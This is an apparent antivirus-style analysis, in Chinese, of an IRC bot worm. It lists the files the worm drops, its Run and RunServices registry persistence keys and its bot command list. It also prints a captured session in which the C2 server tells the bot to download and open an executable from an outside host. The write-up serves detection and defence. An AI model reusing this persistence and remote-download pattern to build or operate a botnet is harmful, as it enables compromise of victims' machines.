|
1 、衍生下列副本与文件:
%WINDOWS%\System32\svcchost.exe
%Documents and Settings%\当前用户名\Local Settings\Temp\fdsf.exe
2 、新建注册表键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvcc25
Value: String: "svcchost.exe "
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServices\msvcc25
Value: String: "svcchost.exe "
3 、连接网络下载病毒体:
// 连接 IRC 服务器,接收下载指令,服务器地址 :66.109.25.***:11640
NICK CHN|355814
USER fjbwnju 0 0 :CHN|355814
:NaNu 001 CHN|355814 :MySQL CHN|355814!~fjbwnju@222.171.7.***
:NaNu 376 CHN|355814 :
:CHN|355814 MODE CHN|355814 :+i
USERHOST CHN|355814
:NaNu 302 CHN|355814 :CHN|355814=+~fjbwnju@222.171.7.***
MODE CHN|355814 +x+i
JOIN ##salvage,##salvage2 he 爃 e
:CHN|355814!~fjbwnju@222.171.7.*** JOIN :##salvage :
NaNu 332 CHN|355814 ##salvage :
. 燿 http://72.20.4.***:1182/4.exe fdsf.exe 1
:NaNu 333 CHN|355814 ##salvage 10:30 PM 1184798286
:NaNu 366 CHN|355814 ##salvage :End of /NAMES list.
:CHN|355814!~fjbwnju@222.171.7.*** JOIN :##salvage2
:NaNu 366 CHN|355814 ##salvage2 :End of /NAMES list.
PRIVMSG ##salvage :[DOWNLOAD]: Downloading URL:
http://72.20.4.***:1182/4.exe to: fdsf.exe.// 下载地址
PRIVMSG ##salvage :[DOWNLOAD]: Downloaded 70.7 KB to fdsf.exe @ 8.8 KB/sec.
PRIVMSG ##salvage :[DOWNLOAD]: Opened: fdsf.exe.
4 、响应的IRC命令包括下列:
ping
pong
join
userhost
host
nick
kick
part
quit
notice
rn
logout
clone
clonestop
scan
scanstop
reconnect
disconnect
sysinfo
killthread
open
upload
reboot
download
注:
%System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。Windows2000/NT 中默认的安装路径是 C:\Winnt\System32 , windows95/98/me 中默认的
安装路径是 C:\Windows\System , windowsXP 中默认的安装路径是 C:\Windows\System32 。
|